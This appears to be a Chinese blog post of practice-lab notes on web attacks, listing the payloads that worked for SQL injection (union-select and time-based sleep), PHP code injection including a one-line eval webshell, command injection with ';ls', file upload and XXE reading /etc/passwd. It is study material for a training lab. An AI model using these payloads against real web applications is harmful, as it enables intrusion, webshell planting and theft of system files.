SQL injections
Example 1:测试出有五列数据,999’ union select 1,2,3,4,5–+之后,可以将1,2,3换成database(),@@version,@@datadir等
Example 2:测试发现root’or‘1’=‘1可以
Example 3:测试发现name=root%27or%271%27=%271%27%23可以
Example 4:直接?id=1 or 1=1–+可以
Example 5:同上
Example 6:测试发现3 union select 1,2,3,4,5#可以
Example 7:一直没找到注入方法,查找资料后发现是因为需要换行,疑惑的我决定查看源代码,好吧我承认没看明白,但答案是用换行替换空格?id=5%0aor%201=1%23
Example 8:name` or (if(length(database())=0,NULL,sleep(1)))%23
Example 9:order=age and (if(length(database())=0,NULL,sleep(1)))%23
Code injection
Example 1:代码注入,name=后面跟着的内容都打印,经过一连串报错以后发现name=a";echo"B";echo"c后会输出aBc,然后在echo"B"位置尝试闭合前后的php代码成功,接着在B位置填写一句话木马name=a";?><?php @eval($_POST[‘socgo’]);?><?php echo"c蚁剑可以连接
Example 2:放空参数后报错,随意输入参数也报错,基本就是三个内容:需要两个参数,usort()函数,需要闭合大括号或者$;嗯,然后,然后我也做不出来了,查资料发现闭合方式和命令执行方式,然后尝试=id);}system(‘cd /etc;vi passwd%27);//可以看到敏感信息,也可以多语句执行
Example 3:放空pattern=参数后报错,提示preg_replace()错误,根据尝试预测函数格式是preg_replace(需要替换的字符串/替换为的字符串/原字符串);尝试闭合,然后,然后有没有然后了;查找资料,发现方向错了,可以在new的位置进行注入,同时需要加e参数,如new=phpinfo()&pattern=/lamer/e&base=Hello lamer
Example 4:放空后assert()报错,但是没有想到怎么注入,查看源代码也没明白,但看到大佬的解答?name=hacker’.system(whoami).'拼接方法,大佬解答地址如下:https://www.freesion.com/article/66791284915/
File Upload
Example 1:直接上传php文件,蚁剑连接成功
Example 2:上传PHP也成功了。。。
Commands injection
Example 1:参数后面分号新命令即可;ls
Example 2:分号换成%0a换行
Example 3:这个没弄明白,看了一下资料才明白,发现在BP抓包里可以看到返回信息
XML attacks
Example 1:xml没整太明白,根据资料]>&passwd;做url编码后可以
Example 2:嗯,按照资料是把XML文档做数据存储使用,利用payload读取其中数据,不太会做继续看资料https://blog.csdn.net/swl412/article/details/128924831
Directory traversal
Example 1: ?…
Example 2: ?…
Example 3: ?…
07-03
07-03
“相关推荐”对你有帮助么?
-
非常没帮助
-
没帮助
-
一般
-
有帮助
-
非常有帮助
提交